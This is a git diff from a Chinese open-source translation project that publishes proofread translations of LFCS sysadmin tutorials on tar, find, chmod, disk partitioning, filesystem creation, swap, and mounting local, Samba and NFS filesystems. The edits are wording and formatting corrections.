-Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高一点。另外,xz是最新的压缩工具,压缩率最好。xz 具有最佳压缩率的代价是:完成压缩操作花费最多时间,压缩过程中占有较多系统资源。
+|长选项|缩写|描述|
+|-----|:--:|:--|
+| --directory dir| C| 执行归档操作前,先转到指定目录|
+| --same-permissions| p| 保持原始的文件权限|
+| --verbose| v| 列出所有读取或提取的文件。该标识符与 --list 一起使用时,还会显示文件大小、属主和时间戳的信息|
+| --verify| W| 写入存档后进行校验|
+| --exclude file| | 不把指定文件包含在内|
+| --exclude-from=file| X| 排除指定文件中所列模式匹配到的文件|
+| --gzip 或 --gunzip| z| 通过 gzip 压缩归档|
+| --bzip2| j| 通过 bzip2 压缩归档|
+| --xz| J| 通过 xz 压缩归档|
+
+
+Gzip 是最古老的压缩工具,压缩率最小;bzip2 的压缩率稍高一点;而 xz 是最新的压缩工具,压缩率最好。xz 获得最佳压缩率的代价是:完成压缩操作花费的时间最多,压缩过程中占用的系统资源也较多。
通常,通过这些工具压缩的 tar 文件相应地具有 .gz、.bz2 或 .xz 的扩展名。在下列的例子中,我们使用 file1、file2、file3、file4 和 file5 进行演示。
**通过 gzip、bzip2 和 xz 压缩归档**
-归档当前工作目录的所有文件,并以 gzip、bzip2 和 xz 压缩刚刚的归档文件(请注意,用正则表达式来指定那些文件应该归档——这是为了防止归档工具包前一步生成的文件打包进来)。
+归档当前工作目录的所有文件,并以 gzip、bzip2 和 xz 压缩刚刚的归档文件(请注意,用正则表达式来指定哪些文件应该归档——这是为了防止将归档工具包前一步生成的文件打包进来)。
# tar czf myfiles.tar.gz file[0-9]
# tar cjf myfiles.tar.bz2 file[0-9]
@@ -167,7 +74,7 @@ Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高
![Compress Multiple Files Using tar](http://www.tecmint.com/wp-content/uploads/2014/10/Compress-Multiple-Files.png)
-压缩多个文件
+*压缩多个文件*
**列举 tarball 中的内容和更新/追加文件到归档文件中**
@@ -177,7 +84,7 @@ Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高
![Check Files in tar Archive](http://www.tecmint.com/wp-content/uploads/2014/10/List-Archive-Content.png)
-列举归档文件中的内容
+*列举归档文件中的内容*
运行以下任意一条命令:
@@ -206,19 +113,19 @@ Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高
假设你现在需要备份用户的家目录。一个有经验的系统管理员会选择在备份时忽略所有的视频和音频文件(也可能是公司规定)。
-可能你最先想到的方法是在备份是时候,忽略扩展名为 .mp3 和 .mp4(或者其他格式)的文件。但如果你有些自作聪明的用户将扩展名改为 .txt 或者 .bkp,那你的方法就不灵了。为了发现并排除音频或者视频文件,你需要先检查文件类型。以下 shell 脚本可以代你完成类型检查:
+可能你最先想到的方法是在备份的时候,忽略扩展名为 .mp3 和 .mp4(或者其他格式)的文件。但如果你有些自作聪明的用户将扩展名改为 .txt 或者 .bkp,那你的方法就不灵了。为了发现并排除音频或者视频文件,你需要先检查文件类型。以下 shell 脚本可以代你完成类型检查:
#!/bin/bash
# 把需要进行备份的目录传递给 $1 参数.
DIR=$1
- #排除文件类型中包含了 mpeg 字符串的文件,然后创建 tarball 并进行压缩。
+ # 排除文件类型中包含了 mpeg 字符串的文件,然后创建 tarball 并进行压缩。
# -若文件类型中包含 mpeg 字符串, $?(最后执行的命令的退出状态)返回 0,然后文件名被定向到排除选项。否则返回 1。
# -若 $? 等于 0,该文件从需要备份文件的列表排除。
tar X <(for i in $DIR/*; do file $i | grep -i mpeg; if [ $? -eq 0 ]; then echo $i; fi;done) -cjf backupfile.tar.bz2 $DIR/*
![Exclude Files in tar Archive](http://www.tecmint.com/wp-content/uploads/2014/10/Exclude-Files-in-Tar.png)
-排除文件进行备份
+*排除文件进行备份*
**使用 tar 保持文件的原有权限进行恢复**
@@ -228,7 +135,7 @@ Gzip 是最古老的压缩工具,压缩率最小,bzip2 的压缩率稍微高
![Restore Files from tar Archive](http://www.tecmint.com/wp-content/uploads/2014/10/Restore-tar-Backup-Files.png)
-从归档文件中恢复
+*从归档文件中恢复*
**扩展阅读:**
@@ -243,31 +150,31 @@ find 命令用于递归搜索目录树中包含指定字符的文件和目录,
#### 基本语法:####
-# find [需搜索的目录] [表达式]
+ # find [需搜索的目录] [表达式]
**通过文件大小递归搜索文件**
-以下命令会搜索当前目录(.)及其下两层子目录(-maxdepth 3,包含当前目录及往下两层的子目录)大于 2 MB(-size +2M)的所有文件(-f)。
+以下命令会搜索当前目录(.)及其下两层子目录(-maxdepth 3,包含当前目录及往下两层的子目录)中大于 2 MB(-size +2M)的所有普通文件(-type f)。
# find . -maxdepth 3 -type f -size +2M
![Find Files by Size in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Find-Files-Based-on-Size.png)
-
-通过文件大小搜索文件
+*通过文件大小搜索文件*
**搜索符合一定规则的文件并将其删除**
-有时候,777 权限的文件通常为外部攻击者打开便利之门。不管是以何种方式,让所有人都可以对文件进行任意操作都是不安全的。对此,我们采取一个相对激进的方法——删除这些文件(‘{ }’用来“聚集”搜索的结果)。
+777 权限的文件通常会为外部攻击者打开便利之门。不管是以何种方式,让所有人都可以对文件进行任意操作都是不安全的。对此,我们采取一个相对激进的方法——删除这些文件('{}' + 用来“聚集”搜索的结果)。
# find /home/user -perm 777 -exec rm '{}' +
![Find all 777 Permission Files](http://www.tecmint.com/wp-content/uploads/2014/10/Find-Files-with-777-Permission.png)
-搜索 777 权限的文件
+*搜索 777 权限的文件*
**按访问时间和修改时间搜索文件**
-搜索 /etc 目录下访问时间(-atime)或修改时间(-mtime)大于或小于 6 个月或者刚好 6 个月的配置文件。
+搜索 /etc 目录下访问时间(-atime)或修改时间(-mtime)距今超过 6 个月(+180)、不足 6 个月(-180)或者刚好 6 个月(180)的配置文件(这两个选项以天为单位)。
按照下面例子对命令进行修改:
@@ -275,7 +182,7 @@ find 命令用于递归搜索目录树中包含指定字符的文件和目录,
![Find Files by Modification Time](http://www.tecmint.com/wp-content/uploads/2014/10/Find-Modified-Files.png)
-按修改时间搜索文件
+*按修改时间搜索文件*
- 扩展阅读: [35 Practical Examples of Linux ‘find’ Command][3]
@@ -301,11 +208,11 @@ new_mode 可以是 3 位八进制数值或者对应权限的表达式。
八进制数值可以由对应的二进制数值等值转换而来,通过下列方法来计算文件属主、同组用户和其他用户权限对应的二进制数值:
-一个确定权限的二进制数值表现为 2 的幂(r=2^2,w=2^1,x=2^0),当权限省缺时,二进制数值为 0。如下:
+一个确定权限的二进制数值表现为 2 的幂(r=2\^2,w=2\^1,x=2\^0),当权限省缺时,二进制数值为 0。如下:
![Linux File Permissions](http://www.tecmint.com/wp-content/uploads/2014/10/File-Permissions.png)
-文件权限
+*文件权限*
使用八进制数值设置上图的文件权限,请输入:
@@ -313,7 +220,6 @@ new_mode 可以是 3 位八进制数值或者对应权限的表达式。
通过 u、g 和 o 分别代表用户、同组用户和其他用户,然后你也可以使用权限表达式来单独对用户设置文件的权限模式。也可以通过 a 代表所有用户,然后设置文件权限。通过 + 号或者 - 号相应的赋予或移除文件权限。
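
例如,下面这条命令(这里的 myfile 仅为示例文件名)为属主添加执行权限,同时移除其他用户的写权限:

# chmod u+x,o-w myfile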
-
**为所有用户撤销一个 shell 脚本的执行权限**
正如之前解释的那样,我们可以通过 - 号为需要移除权限的属主、同组用户、其他用户或者所有用户去掉指定的文件权限。下面命令中的短横线(-)可以理解为:移除(-)所有用户(a)的 backup.sh 文件执行权限(x)。
@@ -324,11 +230,13 @@ new_mode 可以是 3 位八进制数值或者对应权限的表达式。
当我们使用 3 位八进制数值为文件设置权限的时候,第一位数字代表属主权限,第二位数字代表同组用户权限,第三位数字代表其他用户的权限:
-- 属主:(r=2^2 + w=2^1 + x=2^0 = 7)
-- 同组用户:(r=2^2 + w=2^1 + x=2^0 = 7)
-- 其他用户:(r=2^2 + w=0 + x=0 = 4),
+- 属主:(r=2\^2 + w=2\^1 + x=2\^0 = 7)
+- 同组用户:(r=2\^2 + w=2\^1 + x=2\^0 = 7)
+- 其他用户:(r=2\^2 + w=0 + x=0 = 4)
- # chmod 774 myfile
+命令如下:
+
+ # chmod 774 myfile
随着练习时间的推移,你会知道何种情况下使用哪种方式来更改文件的权限模式的效果最好。
@@ -336,7 +244,7 @@ new_mode 可以是 3 位八进制数值或者对应权限的表达式。
![Linux File Listing](http://www.tecmint.com/wp-content/uploads/2014/10/Linux-File-Listing.png)
-列举 Linux 文件
+*列举 Linux 文件*
通过 chown 命令可以对文件的归属权进行更改,可以同时或者分开更改属主和属组。其基本语法为:
@@ -367,9 +275,9 @@ new_mode 可以是 3 位八进制数值或者对应权限的表达式。
先行感谢!
参考链接
-- [About the LFCS][4]
-- [Why get a Linux Foundation Certification?][5]
-- [Register for the LFCS exam][6]
+- [关于 LFCS][4]
+- [为什么需要 Linux 基金会认证?][5]
+- [注册 LFCS 考试][6]
--------------------------------------------------------------------------------
@@ -377,7 +285,7 @@ via: http://www.tecmint.com/compress-files-and-finding-files-in-linux/
作者:[Gabriel Cánepa][a]
译者:[GHLandy](https://github.com/GHLandy)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/translated/tech/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md b/published/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md
similarity index 82%
rename from translated/tech/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md
rename to published/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md
index 987ea4a7f8..77bd84087c 100644
--- a/translated/tech/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md
+++ b/published/LFCS/Part 4 - LFCS--Partitioning Storage Devices, Formatting Filesystems and Configuring Swap Partition.md
@@ -1,13 +1,11 @@
-GHLandy Translated
-
-LFCS 系列第四讲:分区存储设备、格式化文件系统和配置交换分区
-
+LFCS 系列第四讲:对存储设备分区、格式化文件系统和配置交换分区
================================================================================
+
去年八月份,Linux 基金会发起了 LFCS(Linux Foundation Certified Sysadmin,Linux 基金会认证系统管理员)认证,给所有系统管理员一个展现自己的机会。通过基础考试后,他们可以胜任在 Linux 上的整体运维工作:包括系统支持、一流水平的诊断和监控以及在必要之时向其他支持团队提交帮助请求等。
![Linux Foundation Certified Sysadmin – Part 4](http://www.tecmint.com/wp-content/uploads/2014/10/lfcs-Part-4.png)
-LFCS 系列第四讲
+*LFCS 系列第四讲*
需要注意的是,Linux 基金会认证是非常严格的,通过与否完全要看个人能力。通过在线链接,你可以随时随地参加 Linux 基金会认证考试。所以,你再也不用到考试中心了,只需要不断提高自己的专业技能和经验就可去参加考试了。
@@ -16,13 +14,13 @@ LFCS 系列第四讲
注:youtube 视频
-本讲是《十套教程》系列中的第四讲。在本讲中,我们将涵盖分区存储设备、格式化文件系统和配置交换分区等内容,这些都是 LFCS 认证中的必备知识。
+本讲是系列教程中的第四讲。在本讲中,我们将涵盖对存储设备进行分区、格式化文件系统和配置交换分区等内容,这些都是 LFCS 认证中的必备知识。
-### 分区存储设备 ###
+### 对存储设备分区 ###
分区是一种将单独的硬盘分成一个或多个区的手段。一个分区只是硬盘的一部分,我们可以认为这部分是独立的磁盘,里边包含一个单一类型的文件系统。分区表则是将硬盘上这些分区与分区标识符联系起来的索引。
-在 Linux 中,IBM PC 兼容系统里边用于管理传统 MBR(最新到2009年)分区的工具是 fdisk。对于 GPT(2010年至今)分区,我们使用 gdisk。这两个工具都可以通过程序名后面加上设备名称(如 /dev/sdb)进行调用。
+在 Linux 上,IBM PC 兼容系统里边用于管理传统 MBR(用到 2009 年)分区的工具是 fdisk。对于 GPT(2010 年至今)分区,我们使用 gdisk。这两个工具都可以通过程序名后面加上设备名称(如 /dev/sdb)进行调用。
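+
+例如,要对系统中的第二块硬盘进行操作,可以像下面这样调用(这里的 /dev/sdb 仅为示例设备名,操作前请务必确认目标设备,以免破坏数据):
+
+ # fdisk /dev/sdb [管理 MBR 分区]
+ # gdisk /dev/sdb [管理 GPT 分区]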
#### 使用 fdisk 管理 MBR 分区 ####
@@ -34,17 +32,17 @@ LFCS 系列第四讲
![fdisk Help Menu](http://www.tecmint.com/wp-content/uploads/2014/10/fdisk-help.png)
-fdisk 帮助菜单
+*fdisk 帮助菜单*
上图中,使用频率最高的选项已高亮显示。你可以随时按下 “p” 显示分区表。
![Check Partition Table in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Show-Partition-Table.png)
-显示分区表
+*显示分区表*
Id 列显示由 fdisk 分配给每个分区的分区类型(分区 id)。分区类型是一种文件系统的标识符,简单来说,它表示该分区上数据的访问方法。
-请注意,每个分区类型的全面都全面讲解将超出了本教程的范围——本系列教材主要专注于 LFCS 测试,因能力为主。
+请注意,全面讲解每种分区类型超出了本教程的范围——本系列教程主要专注于 LFCS 测试,以考试为主。
**下面列出一些 fdisk 常用选项:**
@@ -58,25 +56,25 @@ Id 列显示由 fdisk 分配给每个分区的分区类型(分区 id)。一
![fdisk Command Options](http://www.tecmint.com/wp-content/uploads/2014/10/fdisk-options.png)
-fdisk 命令选项
+*fdisk 命令选项*
按下 “n” 后接着按下 “p” 会创建一个新的主分区。最后,你可以使用所有的默认值(这将占用所有的可用空间),或者像下面一样自定义分区大小。
![Create New Partition in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Create-New-Partition.png)
-创建新分区
+*创建新分区*
若 fdisk 分配的分区 Id 并不是我们想用的,可以按下 “t” 来更改。
![Change Partition Name in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Change-Partition-Name.png)
-更改分区类型
+*更改分区类型*
全部设置好分区后,按下 “w” 将更改保存到硬盘分区表上。
![Save Partition Changes](http://www.tecmint.com/wp-content/uploads/2014/10/Save-Partition-Changes.png)
-保存分区更改
+*保存分区更改*
#### 使用 gdisk 管理 GPT 分区 ####
@@ -88,7 +86,7 @@ fdisk 命令选项
![Create GPT Partitions in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Create-GPT-Partitions.png)
-创建 GPT 分区
+*创建 GPT 分区*
使用 GPT 分区方案,我们可以在同一个硬盘上创建最多 128 个分区,单个分区最大可达 PB 级,而 MBR 分区方案下单个分区最大只能到 2TB。
@@ -96,7 +94,7 @@ fdisk 命令选项
![gdisk Command Options](http://www.tecmint.com/wp-content/uploads/2014/10/gdisk-options.png)
-gdisk 命令选项
+*gdisk 命令选项*
### 格式化文件系统 ###
@@ -106,14 +104,14 @@ gdisk 命令选项
![Check Filesystems Type in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Check-Filesystems.png)
-检查文件系统类型
+*检查文件系统类型*
选择文件系统取决于你的需求。你应该考虑到每个文件系统的优缺点以及其特点。选择文件系统需要看的两个重要属性:
- 日志支持,允许从系统崩溃事件中快速恢复数据。
-- 安全增强式 Linux(SELinux)支持,按照项目 wiki 所说,“安全增强式 Linux 允许用户和管理员更好的把握访问控制权限”。
+- 安全增强式 Linux(SELinux)支持,按照项目 wiki 所说,“安全增强式 Linux 允许用户和管理员更好的控制访问控制权限”。
-在接下来的例子中,我们通过 mkfs 在 /dev/sdb1上创建 ext4 文件系统(支持日志和 SELinux),标卷为 Tecmint。mkfs 基本语法如下:
+在接下来的例子中,我们通过 mkfs 在 /dev/sdb1 上创建 ext4 文件系统(支持日志和 SELinux),标卷为 Tecmint。mkfs 基本语法如下:
# mkfs -t [filesystem] -L [label] device
或者
@@ -121,7 +119,7 @@ gdisk 命令选项
![Create ext4 Filesystems in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Create-ext4-Filesystems.png)
-创建 ext4 文件系统
+*创建 ext4 文件系统*
### 创建并启用交换分区 ###
@@ -129,7 +127,7 @@ gdisk 命令选项
下面列出选择交换分区大小的经验法则:
-物理内存不高于 2GB 时,取两倍物理内存大小即可;物理内存在 2GB 以上时,取一倍物理内存大小即可;并且所取大小应该大于 32MB。
+> 物理内存不高于 2GB 时,取两倍物理内存大小即可;物理内存在 2GB 以上时,取一倍物理内存大小即可;并且所取大小应该大于 32MB。
所以,如果:
@@ -142,7 +140,7 @@ M为物理内存大小,S 为交换分区大小,单位 GB,那么:
记住,这只是基本的经验法则。最终决定是否使用交换分区以及其大小的,还是作为系统管理员的你。
-要配置交换分区,首先要划分一个常规分区,大小像我们之前演示的那样来选取。然后添加以下条目到 /etc/fstab 文件中(其中的X要更改为对应的 b 或 c)。
+要配置交换分区,首先要划分一个常规分区,大小像我们之前演示的那样来选取。然后添加以下条目到 /etc/fstab 文件中(其中的 X 要更改为对应的 b 或 c)。
/dev/sdX1 swap swap sw 0 0
@@ -163,15 +161,15 @@ M为物理内存大小,S 为交换分区大小,单位 GB,那么:
![Create-Swap-Partition in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Create-Swap-Partition.png)
-创建交换分区
+*创建交换分区*
![Add Swap Partition in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Enable-Swap-Partition.png)
-启用交换分区
+*启用交换分区*
### 结论 ###
-在你的系统管理员之路上,创建分区(包括交换分区)和格式化文件系统是非常重要的一部。我希望本文中所给出的技巧指导你到达你的管理员目标。随时在本讲评论区中发表你的技巧和想法,一起为社区做贡献。
+在你的系统管理员之路上,创建分区(包括交换分区)和格式化文件系统是非常重要的一步。我希望本文中所给出的技巧指导你到达你的管理员目标。随时在本讲评论区中发表你的技巧和想法,一起为社区做贡献。
参考链接
@@ -185,7 +183,7 @@ via: http://www.tecmint.com/create-partitions-and-filesystems-in-linux/
作者:[Gabriel Cánepa][a]
译者:[GHLandy](https://github.com/GHLandy)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/translated/tech/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md b/published/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md
similarity index 76%
rename from translated/tech/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md
rename to published/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md
index 1551f4de0c..50344e5da0 100644
--- a/translated/tech/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md
+++ b/published/LFCS/Part 5 - LFCS--How to Mount or Unmount Local and Network Samba and NFS Filesystems in Linux.md
@@ -1,22 +1,18 @@
-GHLandy Translated
-
LFCS 系列第五讲:如何在 Linux 中挂载/卸载本地文件系统和网络文件系统(Samba 和 NFS)
-
================================================================================
-Linux 基金会已经发起了一个全新的 LFCS(Linux Foundation Certified Sysadmin,Linux 基金会认证系统管理员)认证,旨在让来自世界各地的人有机会参加到 LFCS 测试,获得关于有能力在 Linux 系统中执行中间系统管理任务的认证。该认证包括:维护正在运行的系统和服务的能力、全面监控和分析的能力以及何时上游团队请求支持的决策能力。
+Linux 基金会已经发起了一个全新的 LFCS(Linux Foundation Certified Sysadmin,Linux 基金会认证系统管理员)认证,旨在让来自世界各地的人有机会参加到 LFCS 测试,获得关于有能力在 Linux 系统中执行中级系统管理任务的认证。该认证包括:维护正在运行的系统和服务的能力、全面监控和分析的能力以及何时向上游团队请求支持的决策能力。
![Linux Foundation Certified Sysadmin – Part 5](http://www.tecmint.com/wp-content/uploads/2014/10/lfcs-Part-5.png)
-LFCS 系列第五讲
+*LFCS 系列第五讲*
请看以下视频,这里边介绍了 Linux 基金会认证程序。
注:youtube 视频
-本讲是《十套教程》系列中的第三讲,在这一讲里边,我们会解释如何在 Linux 中挂载/卸载本地和网络文件系统。这些都是 LFCS 认证中的必备知识。
-
+本讲是系列教程中的第五讲,在这一讲里边,我们会解释如何在 Linux 中挂载/卸载本地和网络文件系统。这些都是 LFCS 认证中的必备知识。
### 挂载文件系统 ###
@@ -26,20 +22,19 @@ LFCS 系列第五讲
换句话说,管理存储设备的第一步就是把设备关联到文件系统树。要完成这一步,通常可以这样:用 mount 命令来进行临时挂载(用完的时候,使用 umount 命令来卸载),或者通过编辑 /etc/fstab 文件之后重启系统来永久性挂载,这样每次开机都会进行挂载。
-
不带任何选项的 mount 命令,可以显示当前已挂载的文件系统。
# mount
![Check Mounted Filesystem in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/check-mounted-filesystems.png)
-检查已挂载的文件系统
+*检查已挂载的文件系统*
另外,mount 命令通常用来挂载文件系统。其基本语法如下:
# mount -t type device dir -o options
-该命令会指引内核在设备上找到的文件系统(如已格式化为指定类型的文件系统)挂载到指定目录。像这样的形式,mount 命令不会再到 /etc/fstab 文件中进行确认。
+该命令会指引内核将在设备上找到的文件系统(如已格式化为指定类型的文件系统)挂载到指定目录。像这样的形式,mount 命令不会再到 /etc/fstab 文件中进行确认。
除非像下面这样,只指定了挂载点目录或者设备:
@@ -59,20 +54,17 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
读作:
-设备 dev/mapper/debian-home 的格式为 ext4,挂载在 /home 下,并且有以下挂载选项: rw,relatime,user_xattr,barrier=1,data=ordered。
+设备 dev/mapper/debian-home 挂载在 /home 下,它被格式化为 ext4,并且有以下挂载选项: rw,relatime,user_xattr,barrier=1,data=ordered。
**mount 命令选项**
下面列出 mount 命令的常用选项
-
-- async:运许在将要挂载的文件系统上进行异步 I/O 操作
-- auto:标志文件系统通过 mount -a 命令挂载,与 noauto 相反。
-
-- defaults:该选项为 async,auto,dev,exec,nouser,rw,suid 的一个别名。注意,多个选项必须由逗号隔开并且中间没有空格。倘若你不小心在两个选项中间输入了一个空格,mount 命令会把后边的字符解释为另一个参数。
+- async:允许在将要挂载的文件系统上进行异步 I/O 操作
+- auto:标示该文件系统通过 mount -a 命令挂载,与 noauto 相反。
+- defaults:该选项相当于 `async,auto,dev,exec,nouser,rw,suid` 的组合。注意,多个选项必须由逗号隔开并且中间没有空格。倘若你不小心在两个选项中间输入了一个空格,mount 命令会把后边的字符解释为另一个参数。
- loop:将镜像文件(如 .iso 文件)挂载为 loop 设备。该选项可以用来模拟显示光盘中的文件内容。
- noexec:阻止该文件系统中可执行文件的执行。与 exec 选项相反。
-
- nouser:阻止任何用户(除 root 用户外) 挂载或卸载文件系统。与 user 选项相反。
- remount:重新挂载文件系统。
- ro:只读模式挂载。
@@ -91,7 +83,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
![Mount Device in Read Write Mode](http://www.tecmint.com/wp-content/uploads/2014/10/Mount-Device-Read-Write.png)
-可读写模式挂载设备
+*可读写模式挂载设备*
**以默认模式挂载设备**
@@ -102,26 +94,25 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
![Mount Device in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Mount-Device.png)
-挂载设备
+*挂载设备*
在这个例子中,我们发现写入文件和命令都完美执行了。
### 卸载设备 ###
-使用 umount 命令卸载设备,意味着将所有的“在使用”数据全部写入到文件系统了,然后可以安全移除文件系统。请注意,倘若你移除一个没有事先正确卸载的文件系统,就会有造成设备损坏和数据丢失的风险。
+使用 umount 命令卸载设备,意味着将所有的“在使用”数据全部写入到文件系统,然后可以安全移除文件系统。请注意,倘若你移除一个没有事先正确卸载的设备,就会有造成设备损坏和数据丢失的风险。
-也就是说,你必须设备的盘符或者挂载点中退出,才能卸载设备。换言之,当前工作目录不能是需要卸载设备的挂载点。否则,系统将返回设备繁忙的提示信息。
+也就是说,你必须“离开”设备的块设备描述符或者挂载点,才能卸载设备。换言之,你的当前工作目录不能是需要卸载设备的挂载点。否则,系统将返回设备繁忙的提示信息。
![Unmount Device in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Unmount-Device.png)
-卸载设备
+*卸载设备*
离开需卸载设备的挂载点最简单的方法就是,运行不带任何选项的 cd 命令,这样会回到当前用户的家目录。
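
例如,一个最简单的卸载流程(这里假设设备之前挂载在 /mnt):

# cd
# umount /mnt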
-
### 挂载常见的网络文件系统 ###
-最常用的两种网络文件系统是 SMB(Server Message Block,服务器消息块)和 NFS(Network File System,网络文件系统)。如果你只向类 Unix 客户端提供共享,用 NFS 就可以了,如果是向 Windows 和其他类 Unix客户端提供共享服务,就需要用到 Samba 了。
+最常用的两种网络文件系统是 SMB(Server Message Block,服务器消息块)和 NFS(Network File System,网络文件系统)。如果你只向类 Unix 客户端提供共享,用 NFS 就可以了,如果是向 Windows 和其他类 Unix 客户端提供共享服务,就需要用到 Samba 了。
扩展阅读
@@ -130,13 +121,13 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
下面的例子中,假设 Samba 和 NFS 已经在地址为 192.168.0.10 的服务器上架设好了(请注意,架设 NFS 服务器也是 LFCS 考试中需要考核的能力,我们会在后面的部分提到)。
-
#### 在 Linux 中挂载 Samba 共享 ####
第一步:在 Red Hat 和 Debian 系发行版中安装 samba-client、samba-common 和 cifs-utils 软件包,如下:
# yum update && yum install samba-client samba-common cifs-utils
# aptitude update && aptitude install samba-client samba-common cifs-utils
+
然后运行下列命令,查看服务器上可用的 Samba 共享。
# smbclient -L 192.168.0.10
@@ -145,7 +136,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
![Mount Samba Share in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Mount-Samba-Share.png)
-挂载 Samba 共享
+*挂载 Samba 共享*
上图中,已经对可以挂载到我们本地系统上的共享进行高亮显示。你只需要有一个远程服务器上的合法用户名及密码就可以访问共享了。
@@ -164,7 +155,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
![Mount Password Protect Samba Share](http://www.tecmint.com/wp-content/uploads/2014/10/Mount-Password-Protect-Samba-Share.png)
-挂载有密码保护的 Samba 共享
+*挂载有密码保护的 Samba 共享*
#### 在 Linux 系统中挂载 NFS 共享 ####
@@ -185,7 +176,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
![Mount NFS Share in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Mount-NFS-Share.png)
-挂载 NFS 共享
+*挂载 NFS 共享*
### 永久性挂载文件系统 ###
@@ -197,13 +188,12 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
其中:
-- : 第一个字段指定挂载的设备。大多数发行版本都通过分区的标卷(label)或者 UUID 来指定。这样做可以避免分区号改变是带来的错误。
-- : 第二字段指定挂载点。
-- :文件系统的类型代码与 mount 命令挂载文件系统时使用的类型代码是一样的。通过 auto 类型代码可以让内核自动检测文件系统,这对于可移动设备来说非常方便。注意,该选项可能不是对所有文件系统可用。
-- : 一个(或多个)挂载选项。
-- : 你可能把这个字段设置为 0(否则设置为 1),使得系统启动时禁用 dump 工具(dump 程序曾经是一个常用的备份工具,但现在越来越少用了)对文件系统进行备份。
-
-- : 这个字段指定启动系统是是否通过 fsck 来检查文件系统的完整性。0 表示 fsck 不对文件系统进行检查。数字越大,优先级越低。因此,根分区(/)最可能使用数字 1,其他所有需要检查的分区则是以数字 2.
+- \<file system\>: 第一个字段指定挂载的设备。大多数发行版本都通过分区的标卷(label)或者 UUID 来指定。这样做可以避免分区号改变时带来的错误。
+- \<mount point\>: 第二个字段指定挂载点。
+- \<type\>:文件系统的类型代码与 mount 命令挂载文件系统时使用的类型代码是一样的。通过 auto 类型代码可以让内核自动检测文件系统,这对于可移动设备来说非常方便。注意,该选项可能不是对所有文件系统可用。
+- \<options\>: 一个(或多个)挂载选项。
+- \<dump\>: 你可能把这个字段设置为 0(否则设置为 1),使得系统启动时禁用 dump 工具(dump 程序曾经是一个常用的备份工具,但现在越来越少用了)对文件系统进行备份。
+- \<pass\>: 这个字段指定启动系统时是否通过 fsck 来检查文件系统的完整性。0 表示 fsck 不对文件系统进行检查。数字越大,优先级越低。因此,根分区(/)最可能使用数字 1,其他所有需要检查的分区则使用数字 2。
**mount 命令示例**
@@ -211,7 +201,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
LABEL=TECMINT /mnt ext4 rw,noexec 0 0
-2. 若你想在系统启动时挂载 DVD 光驱中的内容,添加已下语句。
+2. 若你想在系统启动时挂载 DVD 光驱中的内容,添加以下语句。
/dev/sr0 /media/cdrom0 iso9660 ro,user,noauto 0 0
@@ -219,7 +209,7 @@ mount 命令会尝试寻找挂载点,如果找不到就会查找设备(上
### 总结 ###
-可以放心,在命令行中挂载/卸载本地和网络文件系统将是你作为系统管理员的日常责任的一部分。同时,你需要掌握 /etc/fstab 文件的编写。希望本文对你有帮助。随时在下边发表评论(或者提问),并分享本文到你的朋友圈。
+不用怀疑,在命令行中挂载/卸载本地和网络文件系统将是你作为系统管理员的日常责任的一部分。同时,你需要掌握 /etc/fstab 文件的编写。希望本文对你有帮助。随时在下边发表评论(或者提问),并分享本文到你的朋友圈。
参考链接
@@ -234,7 +224,7 @@ via: http://www.tecmint.com/mount-filesystem-in-linux/
作者:[Gabriel Cánepa][a]
译者:[GHLandy](https://github.com/GHLandy)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
